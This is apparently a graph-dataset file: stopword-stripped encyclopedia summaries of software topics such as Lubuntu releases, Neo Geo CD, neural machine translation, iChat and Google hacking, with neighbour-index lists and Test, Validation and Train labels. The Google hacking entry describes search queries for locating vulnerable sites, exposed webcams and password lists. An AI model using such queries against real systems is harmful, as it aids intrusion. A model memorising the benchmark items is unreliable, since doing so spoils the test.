risen ninth place distrowatch 30-day list popular distributions lubuntu 11.10 first version lubuntu official sanction member ubuntu family part status change lubuntu 11.10 used latest ubuntu infrastructure iso files hosted ubuntu release include many new features work focused integration ubuntu instead 11.10 released 13 october 2011 day ubuntu 11.10 released september 2011 announced work lubuntu software center progressing ubuntu software center resource intensive lubuntu lubuntu using less user-friendly synaptic package manager recent releases development new lightweight application manager lubuntu intended rectify problem although users course install ubuntu software center using synaptic changes lubuntu 11.10 include built ubuntu official build system using current packages default alternative install 64-bit isos provided use xfce4-power-manager new microblog client pidgin-microblog new theme rafael laguna lubuntu 11.10 requires minimum 128 mb ram run 256 mb ram install graphic installer recommended minimum ram run live cd session 384 mb lubuntu 11.10 iso file contains known issue causes fail load live cd session hardware instead loading command prompt users required enter codice_1 prompt run live cd session review lubuntu 11.10 pc mech writer rich menga described simple rock-solid reliable trustworthy added ubuntu point suffering major bloat interface side things even say xubuntu point – lubuntu gets back great linux distro end october 2011 lubuntu risen seventh place distrowatch one month popularity list review linux user developer november 2011 russell barnes praised lubuntu 11.10 low system hardware requirements providing alternative gnome kde saying aesthetic appeal functionality minimally compromised effort sleek light possible barnes noted mark shuttleworth may wise offer full status lubuntu release given fuss bluster surrounding unity aesthetics stated trademark pale blue desktop almost hypnotic ’ incredibly clean clear logically laid – user experience million miles away ubuntu 11.10 ’ unity gnome shell counterparts comparison ’ almost cleansing nature simplicity barnes rated 4/5 concluded ’ flexible pretty gnome 2 lubuntu 11.10 certainly got everything need keep computer happy desktop clean clutter-free igor ljubuncic dedoimedo said lubuntu 11.10 lubuntu meant offer valid alternative heavier kde unity flavors tries bravely fails heroically advantage somewhat reduced system resource usage triply negatively compensated drawbacks desktop environment well incomplete integration samba-related crashes laptop hotkeys jumbled system tray icons low battery life want really mean could add lack customization average software arsenal dozen smaller things get way ... lubuntu could work exciting spectacular way packages handsome bag problems easily avoid using main release ... would recommend edition ... grade 6/10 lubuntu 12.04 released 26 april 2012 planning release took place ubuntu developer summit held early november 2011 changes planned time release included use lightdm x display manager blueman instead gnome-bluetooth managing bluetooth devices lubuntu software center added release provide user-friendly graphical interface managing applications synaptic package manager still installed default allows users manage packages system gdebi allows installation downloaded .deb packages lubuntu 12.04 released linux v3.2.14 linux kernel also introduced large number bug fixes particularly lx panel pcmanfm file manager ubuntu backports repository enabled default meaning backport packages installed default installed automatically upgraded newer versions lubuntu 12.10 released 18 october 2012 includes new version session manager customization integration options also includes new version pcman file manager external thumbnail support version new artwork including new wallpaper new icon set entitled box adjusted gtk themes notification-daemon replaced xfce4-notifyd default installation previous versions lubuntu gui search function catfish search utility added default installation version lubuntu uses linux kernel 3.5.5 python 3.2 openjdk7 default java implementation installation requires cpu physical address extensions pae indicates intel pentium pro newer cpu except 400 mhz-bus versions pentium m. case powerpcs tested powerpc g4 running 867 mhz 640 mb ram also run intel-based apple macs also version supports arm architecture developers currently provide installation instructions one arm-based device toshiba ac100 netbook release lubuntu support uefi secure boot unlike ubuntu 12.10 would allowed run hardware designed windows 8 lubuntu 12.10 could run uefi secure boot hardware turning secure boot feature lubuntu 13.04 released 25 april 2013 version incorporated minor changes lubuntu 12.10 including new version pcmanfm file manager incorporates built-in search utility due particular file manager update catfish search utility longer required deleted lubuntu 13.04 also introduced artwork improvements new wallpaper offerings new icons new installation slideshow minimum system requirements lubuntu 13.04 pentium ii celeron cpu pae support 128 mb ram least 2 gb hard-drive space release also still supports powerpc architecture requiring g4 867 mhz processor 640 mb ram minimum julien lavergne announced june 2013 lubuntu 13.10 would ship firefox default browser place chromium release also used lightdm screen locking included zram reviewing beta release september 2013 joey sneddon omg ubuntu said lubuntu never looked good latest beta noted new box icon theme expanded progress bar colours softened window controls enlarged along sharpened start button final release incorporated minor changes 13.04 included new version pcmanfm includes file search function allowed catfish desktop search removed also new artwork included bug fixes gnome-mplayer gpicview image viewer reviewing lubuntu 13.10 jim lynch said sometimes less much much comes linux distributions lubuntu 13.10 offers advantages ubuntu much minimalist package tentative plans announced april 2013 make lubuntu 14.04 long term support release november 2013 confirmed 14.04 would first lubuntu lts release three years support release also saw xscreensaver replaced light-locker screen lock released 17 april 2014 lubuntu 14.04 included minor updates version 13.10 along featured file manager download media lubuntu 14.04 available pc 32 bit pc 64 bit mac intel 64 bit mac powerpc early intel macs 32 bit core solo processor 32-bit pc image available reviewing lubuntu 14.04 lts silviu stahie softpedia noted uses similar layout one found old defunct windows xp os considered good appropriate replacement microsoft operating system 1 june 2014 jim lynch reviewed lubuntu 14.04 lts concluded lubuntu 14.04 lts performed well fast quite stable using problems running applications system whole lived reputation great choice ubuntu minimalists ... lxde desktop environment different unity ubuntu gnome 3 ubuntu gnome ’ traditional desktop means ’ quick easy learn use someone ’ like unity gnome lxde lubuntu 14.04 lts might doctor ordered ’ get benefits ubuntu without discomfort unity interface release 23 october 2014 originally intended feature version lxde based upon qt toolkit called lxqt development latter delayed feature implemented time lubuntu 14.10 incorporated general bug fixes preparation implementation lxqt updated lxde components new artwork including icons theme update silviu stahie writing softpedia stated one main characteristics lubuntu fact fast even older computers basically lubuntu able run anything built last decade operating systems claim thing ... like ubuntu base lubuntu 14.10 seen important visual modifications although many packages updated hood theme icons updated developers preparing make switch lxqt project still works igor ljubuncic dedoimedo said lubuntu 14.10 nothing functionally wrong lubuntu bad simply interesting meat without flavor hybrid car accounting lessons local evening school morning news visit pompei blindfolded excitement ... liked desktop environment past stagnated n't evolved competitors left far behind reflects poorly lubuntu despite calm stable record spartan behavior left absolute zero emotional attachment toward released 23 april 2015 lubuntu 15.04 consisted primarily bug fixes project prepared planned switch lxqt lubuntu 15.10 lubuntu box theme updated merged ubuntu light theme incorporate recent gtk+ features including new header bars gnome native applications plus improved artwork icons minimum system requirements release include 512 mb ram 1 gb recommended plus pentium 4 pentium amd k8 processor release notes indicated graphics cards nvidia amd/ati/radeon intel work box marius nestor softpedia noted ... lubuntu 15.04 operating system comes updated artwork includes updated theme beautiful icons updated gtk+ infrastructure better compatibility qt applications released 22 october 2015 lubuntu 15.10 originally planned move lxqt qt libraries place gtk+ libraries used lxde june 2015 delayed future release release ended minor bug fix application version update changes versions included new artwork ibus replaced fcitx allowing fonts chinese japanese korean included lubuntu-extra-sessions optional instead default minimum system requirements release stated advanced internet services like google+ youtube google docs facebook computer needs 1 gb ram local programs like libre office simple browsing habits computer needs 512 mb ram ... minimum specification cpu pentium 4 pentium amd k8 older processors slow amd k7 problems flash video ... nvidia amd/ati/radeon intel work box system tweaked work fairly easily joey sneddon omg ubuntu humorously noted lubuntu 15.10 another highly minor bug fix release released 21 april 2016 lubuntu 16.04 long term support lts version supported three years april 2019 second lubuntu lts version preceded 14.04 april 2014 release retains lxde desktop make transition lxqt allow lxqt better tested later non-lts releases release large file fit cd requires dvd usb flash drive installation lubuntu 16.04 lts primarily bug-fix release includes new features updated artwork however system requirements include 512 mb ram 1 gb recommended pentium 4 pentium amd k8 newer cpu first point release 16.04.1 released 21 july 2016 release lubuntu 16.04.2 delayed number times eventually released 17 february 2017 lubuntu 16.04.3 released 3 august 2017 lubuntu 16.04.4 delayed 15 february 2018 released 1 march 2018 lubuntu 16.04.5 released 2 august 2018 8 march 2017 new version firefox 52.0 arrived update process version removed alsa audio support firefox favour pulseaudio something initially mentioned mozilla release notes since lubuntu 16.04 lts shipped alsa audio broke default lubuntu audio system default lubuntu browser response bug filed mozilla developers declined fix issue lubuntu 16.10 released 13 october 2016 uses lxde lxqt implementation lxqt delayed release 17.04 release also features small bug fixes updated lxde components updated artwork particularly wallpaper developers recommended system requirements release advanced internet services like google+ youtube google drive facebook computer needs least 1 gb ram local programs like libreoffice simple browsing habits computer needs least 512 mb ram minimum specification cpu pentium 4 pentium amd k8 older processors slow amd k7 problems flash video joey sneddon omg ubuntu noted new features lubuntu 16.10 longer uses lubuntu software centre switched gnome software ubuntu also sneddon wrote lubuntu 16.10 largely lubuntu 16.04 lts work switching lxqt desktop — expected next release — continues july 2016 article sneddon singled new wallpaper design lubuntu 16.10 saying jaggedy geometric layout new backdrop stands one visually distinct ship recent years marius nestor softpedia wrote appears lot known issues release 're using lubuntu 16.04 lts xenial xerus n't recommend upgrading lubuntu 16.10 least read attempting upgrade operation lubuntu 17.04 released 13 april 2017 like previous releases uses lxde lxqt implementation lxqt lubuntu delayed time 17.10 release incorporated linux kernel 4.10 updated lxde components general bug fixes new artwork recommended system requirements included 1 gb ram 512 mb minimum minimum pentium 4 pentium amd k8 processor joey sneddon omg ubuntu said release compromised mainly bug fixes core app system updates rather screenshot-able new features lubuntu 17.10 released 19 october 2017 release general bug fix release project prepares implementation lxqt also included new versions lxde components new artwork minimum system requirements release remained 512 mb ram 1 gb recommended least pentium 4 pentium amd k8 processor alternate version entitled lubuntu next 17.10 provided lxqt 0.11.1 desktop release available install ... recommend people use production unless aware somewhat critical bugs associated 10 point writing also ’ bad idea contact us well wrote lubuntu developer simon quigley lubuntu 18.04 long term support version released 26 april 2018 last release lubuntu use lxde desktop 18.10 moved using lxqt like past releases 18.04 lts used lxde desktop although work continued move towards deployment lxqt desktop referred lubuntu next release included new artwork including new star field wallpaper system requirements lubuntu 18.04 lts included minimum 1 gb ram although 2 gb recommended better performance plus pentium 4 pentium amd k8 cpu newer ram requirements increased lubuntu 17.10 point releases include 18.04.1 26 july 2018 18.04.2 14 february 2019 14 may 2018 announcement project developers confirmed lubuntu would transition lxqt desktop lubuntu 18.10 released 18 october 2018 included lxqt transition planned release lubuntu 18.04 lts allow testing development three regular releases first long term support version lubuntu 20.04 lts released lxqt project also changed logo early april 2018 anticipation move transitioning lxqt release uses lxqt 0.13.0 based upon qt 5.11.1 applications include libreoffice 6.1.1 office suite vlc media player 3.0.4 player discover software center 5.13.5 featherpad 0.9.0 text editor kde falkon 3.0.1 beta tested default web browser found lack stability replaced firefox 63.0 installer 18.10 calamares system installer place previous ubiquity installer starting release developers longer make recommendations minimum system requirements reviewing beta version 18.10 may 2018 marius nestor softpedia wrote took first lubuntu 18.10 daily build lxqt test drive say 're impressed ... layout simple yet stylish sleek dark theme default single panel bottom screen access everything need ... give five-star rating writing official release 20 october 2018 marius nestor softpedia noted many trials tribulations lot hard work lubuntu team finally managed ship release lxqt desktop environment default instead lxde lightweight x11 desktop environment used default lubuntu releases beginning project also believe lxqt future lxde desktop environment uses old soon deprecated technologies welcome lubuntu 18.10 cosmic cuttlefish shiny lxqt 0.13.0 desktop environment default built latest qt 5.11.1 libraries patched upstream improvements reviewing lubuntu 18.10 distrowatch jesse smith wrote mixed feelings release lubuntu one hand features worked well distribution easy install liked theme operating system pretty easy use aspects n't like usually programs settings modules felt overly complex confusing compared counterparts distributions part though lubuntu nice job capable relatively lightweight distribution ... whole think transition lxde lxqt gone smoothly choices n't like mostly changes minor think people able make leap two desktops fairly easily think settings modules still need polish 'd like see discover replaced modern software manager otherwise felt like graceful mostly positive move 18.04 18.10 lxde lxqt detailed review lubuntu 18.10 mahmudin asharin writing ubuntu buzz found faults release particular network manager concluded users recommend lubuntu 18.04 lts instead sake usability support duration first timer installed/want install 18.10 lxqt go ahead get beautiful user interface nice experience recommend use wicd instead default network manager lxqt desktop pursuer lubuntu 18.10 great example lxqt system try first review full circle magazine noted overall lxqt seen lubuntu 18.10 ready day-to-day use also still room ongoing refinement.introducing lxqt lubuntu 18.10 careful choice lubuntu developers coming right lubuntu 18.04 lts final lxde release gives developers three standard releases continue polish lxqt first lts release ... standard release made schedule 18 april 2019 release marked first lubuntu version without 32-bit support lubuntu developer simon quigley wrote december 2018 release featured lxqt 0.14.1 based upon qt 5.12.2 included working full-disk encryption easier customization calamares installer configurations employing xdg configuration variables austrian keymapping minimum installation ram reduced 500 mb changes include trash home computer network icons added desktop split view pcmanfm-qt exif data display image viewer lximage-qt touchpad settings fixed 18.10 review softpedia writer marius nestor described use lxqt 0.14.1 employed lubuntu 19.04 much-improved richer lxqt experience review full circle magazine concluded lubuntu 18.10 ’ ready prime time 19.04 lxqt looks fresh new everything works right installation even runs fine dvd live session ’ find anything needs fixing 19.04 nine month support period regular release could long term support release least quality user experience lack bugs standard release last one next lts release expected 17 october 2019 standard release expected october 2020 16 august 2018 lubuntu development team announced plans port openbox mir time lubuntu 20.10 allow lubuntu move away x display server implementation wayland instead lxde versions lubuntu 18.04 lts earlier included following applications user applications lxde including 18.04 lts lubuntu also access ubuntu software repositories lubuntu software center synaptic package manager apt allowing installation applications available ubuntu lxqt versions lubuntu 18.10 later include following applications internet applications office applications graphics applications accessories sound video 18.10 lubuntu also access ubuntu software repositories discover software center synaptic package manager apt allowing installation applications available ubuntu
[ 4611, 3079, 6151, 10255, 3089, 4113, 8209, 8727, 543, 11297, 546, 7204, 9253, 11305, 56, 3129, 4153, 59, 8248, 9276, 3649, 4673, 10308, 3654, 5190, 3147, 1101, 2125, 1107, 1110, 89, 5721, 4192, 10851, 3685, 9320, 9324, 10860, 5742, 2671, ...
Test
7,914
2
UNetbootin:unetbootin unetbootin universal netboot installer cross-platform utility create live usb systems load variety system utilities install various linux distributions operating systems without cd installation mode creates bootable usb flash drives bootable usb hard disk drives live usb creator multiple installs device supported installation mode performs network installation frugal install without cd similar performed win32-loader unetbootin distinguishing features support great variety linux distributions portability ability load custom disk image including iso image files support windows linux unlike wubi similar win32-loader installing hard disk unetbootin installs partition disk image thus creating dual-boot setup linux windows
[ 8513, 9377, 292, 6436, 10149, 3815, 6797, 7983, 5618, 823, 6012, 4637 ]
Test
7,915
8
Broadjam:broadjam broadjam us-based music community website founded september 1999 service aimed primarily independent musicians users interact artists enter contests collaborate peers email reviews blogs social networking tools broadjam also works related industries provide various licensing opportunities including placement films tv shows advertising campaigns video games radio play professional reviews broadjam claims one world largest web communities catering independent musicians site online database 500,000 searchable songs home approximately 110,000 artists world company founded roy elkins assistance stephanie essex elkins former corporate sales marketing executive classical singer classical music radio deejay intention provide promotional services unsigned musicians company based madison wisconsin roy formerly vice president sales marketing sonic foundry prior roy training director ensoniq corporation broadjam offers variety services artists gain exposure feedback musicians make bulk site membership broadjam also offers template-based hosting services help members create website broadjam founded 1999 site initially launched 2000 broadjam originally headquartered new glarus wisconsin relocated 2003 madison wisconsin site originally developed provide services independent musicians hoping get foot door music industry time service evolved provides wide range services artists music industry professionals broadjam holds variety sponsored contests aim expose reward exceptional musicianship songwriting broadjam hosts song month contests every month artist reviews scoring system based good better best used determine winner members submit songs radio play professional reviews placement films tv shows commercials video games music supervisors film television utilize broadjam provide music feature films tv shows commercials members give another feedback reviewing mechanism review songs specific genre random songs entire site highest rated songs appear broadjam top 10s broadjam 200 different top 10 charts sortable genre region production style reviewer demographics broadjam calculates top 10s daily based factors include song plays downloads reviews star ratings broadjam offers site hosting services premium members artists host existing sites create one using templates artists mark songs download mp3 file format members browse broadjam library genre region production based fan picks part professional services group broadjam provides online mechanism tallies votes popular music award ceremonies current customers service include academy country music madison area music awards broadjam also provides music encoding service major record labels use service encode catalog control metadata
[]
Test
7,916
3
Neo_Geo_CD:neo geo cd march 1997 570,000 neo geo cd units sold worldwide neo geo cd first unveiled 1994 tokyo toy show console uses cpu set-up arcade cartridge-based neo geo systems facilitating conversions snk planned release neo geo cd versions every neo geo game still arcades three versions neo geo cd released front-loading version original console design top-loading version developed shortly neo geo cd launch scaled-down cheaper alternative model cdz released december 29 1995 japanese market replacement snk previous efforts front loader top loader neo geo cd met limited success due plagued slow loading times could vary 30 60 seconds loads depending game response criticism neo geo cd long load times snk planned produce model double speed cd-rom drive north america compared single speed drive japanese european models however system missed planned north american launch date october 1995 snk declined give specific reason delay announcement new january 1996 launch date stated decided using double speed drive japanese division produced excess number single speed units found modifying units double speed expensive initially thought snk opted sell postponing production double speed model sold stock single speed units cdz officially sold japan production however faster loading times lack region lock fact could play older cd software made popular import item enthusiasts europe north america system technical specs identical previous models except includes double-speed cd-rom drive response reader inquiries neo geo cd software gamepro reported issue cover dated may 1997 snk quietly discontinued console time criticism system generally long loading times began even launch report electronic gaming monthly neo geo cd unveiling noted show showing demo fatal fury 2 prototype machine showed single speed load time 14-28 seconds rounds see screen shot right load screen approximately one month launch snk reported sold neo geo cd entire initial shipment 50,000 units reviewing neo geo cd late 1995 next generation noted snk reputation fun games argued failure upgrade neo geo system 3d capabilities would keep producing truly cutting edge games limit console small cult following neo geo aes system although less expensive games gave 1 1/2 5 stars system also capable reading redbook standard compact disc audio addition multi-av port nearly identical one used sega genesis model 1 though interchangeable neo geo cd models composite rca a/v s-video jacks rear console cd system 56 mbit 7 mb ram split accordingly neo geo cd library consists primarily ports mvs aes titles mvs arcade games officially released neo geo aes ported instead neo geo cd include puzzle bobble janshin densetsu quest jongmaster mahjong game also released pc engine power spikes ii neo drift new technology futsal 5-on-5 mini soccer games unreleased mvs aes formats also released exclusively neo geo cd include ironclad tesshō rusha chōtetsu burikingā brikin'ger crossed swords ii zintrick oshidashi zintorikku adk world neo geo cd special king fighters '96 neo collection samurai shodown rpg shinsetsu samurai spirits bushidō retsuden rpg spin-off samurai shodown series also released sony playstation sega saturn idol-mahjong final romance 2 arcade game mvs game ported directly neo geo cd
[ 8355, 9091, 7269, 10855, 5736, 8937, 10316, 1776, 4690, 8917, 1624, 921, 986, 3256 ]
Test
7,917
5
Streamtuner:streamtuner streamtuner streaming media directory browser use c/python plugin system offers gtk+ 2.0 interface internet radio directories streamtuner actually play files downloads list online radio streams tells unix player user option play selected stream streamtuner offers hundreds thousands music resources common interface streamtuner free software released terms revised bsd license also version nokia 770 internet tablet
[ 8554, 5397, 10270, 7983 ]
Validation
7,918
0
Neural_machine_translation:neural machine translation neural machine translation nmt approach machine translation uses large artificial neural network predict likelihood sequence words typically modeling entire sentences single integrated model require fraction memory needed traditional statistical machine translation smt models furthermore unlike conventional translation systems parts neural translation model trained jointly end-to-end maximize translation performance deep learning applications appeared first speech recognition 1990s first scientific paper using neural networks machine translation appeared 2014 followed lot advances following years large-vocabulary nmt application image captioning subword-nmt multilingual nmt multi-source nmt character-dec nmt zero-resource nmt google fully character-nmt zero-shot nmt 2017 2015 first appearance nmt system public machine translation competition openmt'15 wmt'15 also first time nmt contender following year already 90 nmt systems among winners popularity nmt also owes events introducing nmt section nmt neural mt training annual wmt workshop machine translation first independent workshop nmt google continued afterwards year nmt departs phrase-based statistical approaches use separately engineered subcomponents neural machine translation nmt drastic step beyond traditionally done statistical machine translation smt main departure use vector representations embeddings continuous space representations words internal states structure models simpler phrase-based models separate language model translation model reordering model single sequence model predicts one word time however sequence prediction conditioned entire source sentence entire already produced target sequence nmt models use deep learning representation learning word sequence modeling first typically done using recurrent neural network rnn bidirectional recurrent neural network known encoder used neural network encode source sentence second rnn known decoder used predict words target language convolutional neural networks convnets principle somewhat better long continuous sequences initially used due several weaknesses successfully compensated 2017 using so-called attention -based approaches coverage models addressing issues traditional attention mechanism ignoring past alignment information leading over-translation under-translation 2016 best mt systems using neural networks google microsoft yandex promt translation services use nmt google uses google neural machine translation gnmt preference previous statistical methods microsoft uses similar technology speech translations including microsoft translator live skype translator open source neural machine translation system opennmt released harvard nlp group different linguistic knowledges different language families borrowed idea traditional statistical machine translation smt researchers focus one specific language pairs introducing linguistic knowledge nmt work apply chinese radicals reflecting meaning upper-level composed character sub-character level chinese-english nmt address rare word out-of-vocabulary translation issue
[ 5122, 2440, 2059, 3085, 6798, 11538, 1044, 538, 9645, 7599, 4531, 4662, 3127, 2488, 10557, 6208, 3533, 5197, 6223, 8538, 5857, 7780, 8046, 8688, 10231, 8440, 7164 ]
Validation
7,919
9
Ch_(computer_programming):ch computer programming ch proprietary cross-platform c c++ interpreter scripting language environment originally designed harry h. cheng scripting language beginners learn mathematics computing numerical analysis numeric methods programming c/c++ ch developed marketed softintegration inc. student edition freely available ch professional edition raspberry pi free non-commercial use ch embedded c/c++ application programs numerical computing graphical plotting features ch combined shell ide ch shell combines features common shell c language chide provides quick code navigation symbolic debugging based embedded ch scite scintilla ch written c runs windows linux macos freebsd aix solaris qnx hp-ux supports c90 major c99 features support full set c++ features c99 complex number ieee-754 floating-point arithmetic variable-length array features supported ch became part c99 standard article published computer reseller news crn named ch notable among c-based virtual machines functionality availability third-party libraries ch many toolkits extend functions example ch mechanism toolkit used design analysis commonly used mechanisms fourbar linkage five-bar linkage six-bar linkage crank-slider mechanism cam-follower system ch control system toolkit used modeling design analysis continuous-time discrete-time linear time invariant lti control systems toolkits includes source code ch used integrated curriculum many high schools universities teach computing programming c/c++ ch integrated free c-stem studio platform learning computing science technology engineering mathematics c-stem robotics c-stem studio developed uc davis center integrated computing stem education c-stem offers curriculum k-12 students ch supports lego mindstorms nxt ev3 arduino linkbot finch robot robotalk raspberry pi pi zero arm robot programming learning also embedded labview system-design platform development environment ch supports 1999 iso c standard c99 c++ classes superset c c++ classes several major features c99 supported complex numbers variable length arrays vlas ieee-754 floating-point arithmetic generic mathematical functions specification wide characters addendum 1 c90 also supported c++ features available ch include ch supports classes c++ added abilities including ch interact existing c/c++ libraries call c/c++ functions ch script c/c++ interpreter ch used scripting engine extension language applications pointers arrays variables passed shared c-compiled ch scripting contexts one example embedded ch scripting application mobile-c used collaborative visualization distributed mesh model ch built-in string type string_t automatic memory allocation de-allocation supports shell aliases history piping etc ch built-in 2d/3d graphical plotting features computational arrays numerical computing 2d linear equation form b a*x written verbatim ch
[ 2181, 4267, 5612, 823, 6797, 7341, 7983, 9714, 499, 5588, 9780, 10964, 1399, 1304, 1849, 219, 2045, 7646 ]
Test
7,920
3
Alpine_Linux:alpine linux alpine linux linux distribution based musl busybox designed security simplicity resource efficiency uses hardened kernel compiles user space binaries position-independent executables stack-smashing protection small size heavily used containers providing quick boot times postmarketos project designed run mobile devices based alpine linux originally alpine linux began fork leaf project members leaf wanted continue making linux distribution could fit single floppy disk whereas alpine linux wished include heavyweight packages squid samba well additional security features newer kernel one original goals create framework larger systems although usable purpose longer primary goal
[ 4611, 516, 3079, 10760, 7181, 3089, 4113, 8209, 8727, 6680, 10780, 543, 11297, 3618, 7204, 9253, 5670, 11305, 56, 4153, 3129, 59, 8248, 9276, 3649, 4673, 10817, 3654, 5190, 3147, 2125, 1107, 6227, 2645, 1110, 89, 5721, 4192, 3685, 9324, ...
Test
7,921
7
Peercasting:peercasting peercasting method multicasting streams usually audio and/or video internet via peer-to-peer technology used commercial independent amateur multicasts unlike traditional ip multicast peercasting facilitate on-demand content delivery peercasting usually works peers automatically relay stream peers p2p overlay network helps peers find relay specified stream connect method suffers poor quality service times relays disconnect peers need switch different relay referred churn another solution used minute swarming wherein live stream broken minute length files swarmed via p2p software bittorrent coral dijjer however suffers excessive overhead formation new swarm every minute new technique stripe live stream multiple substreams akin raid striping forward error correction timing information applied substreams original stream reformed using least one substreams fountain codes efficient way make combine substreams turn streams relayed using first method another solution permit clients connect new relay resume streaming left old relay relays would retain back buffer permit clients resume streaming anywhere within range said buffer would essentially extension icecast protocol
[ 8833, 4229, 4490, 11274, 10126, 3350, 10522, 11674, 2076, 10270, 945, 7488, 8640, 11073, 708, 6351, 6991, 7761, 3676, 5085, 3428, 3813, 1908, 9332, 119, 4219 ]
Validation
7,922
3
Deep_Dungeon:deep dungeon dungeon crawler presented first person perspective similar wizardry players navigate nondescript maze-like corridors bid find princess game released exclusively japan april 15 2006 deep dungeon unofficially translated english madō senki set town dorl one day monsters raided town stealing treasures princess etna soul despite attempts brave warriors retrieve soul none successful dungeon player given command list player choose attack enemy vicinity view allocated items escape battle examine area items talk people nearby character effectiveness battle largely determined numerical values attacking power ap defensive power ac health hp values determined character experience level level raises character accumulated experience ex reaches certain point also called deep dungeon ii yūshi monshō second installment deep dungeon series according square enix first 3d dungeon crawler rpg famicom console game villain ruu returned player need explore eight floor tower consisting four ground floors four underground floors find defeat battles much faster paced sequel whereas first game could get slow high miss rate player enemies creating prolonged battle scenes game improved also much higher encounter rate player likely attacked within seconds stand still new feature game player significantly higher level enemies current floor attacked randomly walking hallways although still attacked step predetermined spaces map player gains experience level given attribute points allocate character stats wish unlike console rpgs era stat upgrades usually predetermined randomized beyond player control third installment deep dungeon series first released famicom first deep dungeon title offer player world explore spanning multiple dungeons multiple towns also allows player create party three companions addition hero character choice ranger magician priest character though player dismiss character game started able replace character meet another pre-created playable character one dungeons however game still end soon protagonist swordsman character defeated game retains player-adjustable level-up stats first game well feature removes randomized encounters player significantly higher experience level needed current location one exclusive rather annoying feature game engine sometimes player character fumble remove equipped weapon wasting character turn player wishes re-arm weapon cost player another turn game series award player money gold defeating enemies games force player re-enter maps collect respawning chests money items resale want gold farm fourth final installment deep dungeon series unfortunately game removed custom character feature previous game game player meet two additional playable characters predetermined class game also reverts standard practice randomizing characters stat growth gaining experience level new engine player eventually learn summon two monsters function temporary additional party member single battle also removed feature stops random battles player significantly powerful enemies n't bad seems maps game also much smaller whereas previous games used multi-floor dungeons 32x32 tiles dungeons game either single floor multiple floors fit within single 32x32 map game player accept requests non-player characters optional tasks reward player bonus items experience money finished
[ 9006, 606 ]
Train
7,923
1
SHERPA/RoMEO:sherpa/romeo sherpa/romeo service run sherpa show copyright open access self-archiving policies academic journals database uses colour-coding scheme classify publishers according self-archiving policy shows authors whether journal allows preprint postprint archiving copyright transfer agreements currently hold records 22,000 journals
[ 1857, 10759 ]
Validation
7,924
9
XLispStat:xlispstat xlispstat statistical scientific package based xlisp language xlispstat startup many free statistical software like arc nonlinear curve fitting problems vista based package includes variety statistical functions methods including routines nonlinear curve fit many add-on packages developed extend xlispstat including contingency tables regression analysis xlispstat seen usage many fields including astronomy gis speech acoustics econometrics epidemiology xlispstat historically influential field statistical visualization author luke tierney wrote 1990 book xlispstat dates late 1980s/early 1990s probably saw greatest popularity early-to-mid 1990s greatly declining usage since 1990s widespread use statistical education since mostly replaced r. paper explaining ucla department statistics abandoned 1998 reasons likely hold true many former users source code xlispstat available permissive license similar terms bsd
[ 5129, 7945, 3980, 2317, 6797, 7950, 2457, 7580, 7326, 7983, 6962, 6718, 5830, 5703, 4808, 5833, 5450, 9166, 2000, 9944, 2652, 10848, 4840, 9320, 363, 5612 ]
None
7,925
1
Alacra:alacra alacra inc. privately owned american company provides information workflow tools financial institutions corporations professional services firms company founded data downlink corporation 1996 steven goldstein michael angle renamed alacra inc. june 2001 headquartered new york office london alacra received praise going outside traditional media outlets creating data feed produced monitoring group financial commentators includes bloggers
[]
None
7,926
4
Google_hacking:google hacking google hacking also named google dorking computer hacking technique uses google search google applications find security holes configuration computer code websites use google hacking involves using advanced operators google search engine locate specific strings text within search results popular examples finding specific versions vulnerable web applications search query codice_1 would locate web pages particular text contained within normal default installations applications include running version every page serve example powered xoops 2.2.3 final one even retrieve username password list microsoft frontpage servers inputting given microscript google search field devices connected internet found search string codice_2 find public web cameras another useful search following codice_3 followed search keyword give list files servers example codice_4 give mp3 files available various servers many similar advanced operators used exploit insecure websites link search operator google used turned 2017 concept google hacking dates back 2002 johnny long began collect google search queries uncovered vulnerable systems and/or sensitive information disclosures labeling googledorks list google dorks grew large dictionary queries eventually organized original google hacking database ghdb 2004 since heyday concepts explored google hacking extended search engines bing shodan automated attack tools use custom search dictionaries find vulnerable systems sensitive information disclosures public systems indexed search engines
[ 4995, 5636, 5892, 7816, 5262, 8719, 5524, 7700, 10645, 8858, 1435, 10525, 2978, 4901, 1959, 3499, 10284, 1203, 5431, 7359, 196, 3269, 3782, 11590, 4683, 11343, 3664, 3795, 1240, 4956, 8413, 6367, 2658, 1251, 6632, 5483, 236, 9712, 113, 99...
Test
7,927
4
The_Art_of_Intrusion:art intrusion art intrusion real stories behind exploits hackers intruders deceivers book kevin mitnick collection stories social engineering performed hackers story ends summarizing insight attack well measures defend book published mitnick first book art deception explores themes introduced first book
[ 4986, 4435, 4956, 2558 ]
None
7,928
2
IChat:ichat ichat previously ichat av discontinued instant messaging software application developed apple inc. use mac os x operating system supported instant text messaging xmpp/jingle oscar aim protocol audio video calling screen-sharing capabilities also allowed local network discussion users discovered bonjour protocols os x 10.8 mountain lion later releases ichat replaced messages ichat first released august 2002 part mac os x 10.2 featured integration address book mail applications first officially supported aim client native mac os x first-party aim application time still running classic emulation one episode first season hbo dramedy series entourage eric murphy ichat conversation ari gold marking first time application used television series ichat incorporated apple aqua interface used speech bubbles pictures personify online chatting experience ichat green available yellow idle red away icons could displayed next name connected user buddy list color-blind users could altered show different shapes circle available triangle idle squares away illustrate status shape rather color june 2003 apple announced ichat av second major version ichat added video audio conferencing capabilities based industry-standard session initiation protocol sip final version software shipped mac os x 10.3 became available separately day mac os x 10.2 february 2004 aol introduced aol instant messenger aim version 5.5 windows users enabled video audio chats aim protocol compatible apple ichat av day apple released public beta ichat av 2.1 allow mac os x users video conferencing aim 5.5 users june 2004 steve jobs announced next version ichat av would included mac os x 10.4. ichat av 3 provided additional support allow four people single video conference ten people audio conference additionally new version ichat used h.264/avc codec offered superior quality video compared older h.263 codec used previous versions release supported xmpp protocol could directly used connect google talk indirectly used connect users services including facebook chat yahoo messenger however support limited support several common xmpp features account creation service discovery full multi-user chat support ichat 3 included bonjour protocol previously called rendezvous allowed ichat automatically find users ichat bonjour messaging enabled local network october 2005 ichat received support encrypted communications paid subscribers .mac icloud service features part ichat 3.1 released part mac os x v10.4.3 update version also added support xmpp multi-user chat march 2007 apple released mac os x v10.4.9 update allowed usb video device class uvc cameras used ichat rather firewire cameras allowed wider range cameras used ichat av ichat 4 introduced part mac os x 10.5 received new features including ichat theater inspired chatfx product plum amazing backdrops screen sharing ichat theater allowed users share file supported quick look including photos keynote presentations movies video chat session backdrops allowed users insert movies photos backdrop video chats screen sharing allowed two users mac os x leopard control desktop work collaboratively minor features new release included multiple logins animated icons use photo booth effects live video chat tabbed chats ichat 5.0 released mac os x 10.6 reduced bandwidth required 640×480 video chats upgraded ichat theater resolution ichat 6.0 released mac os x 10.7 added 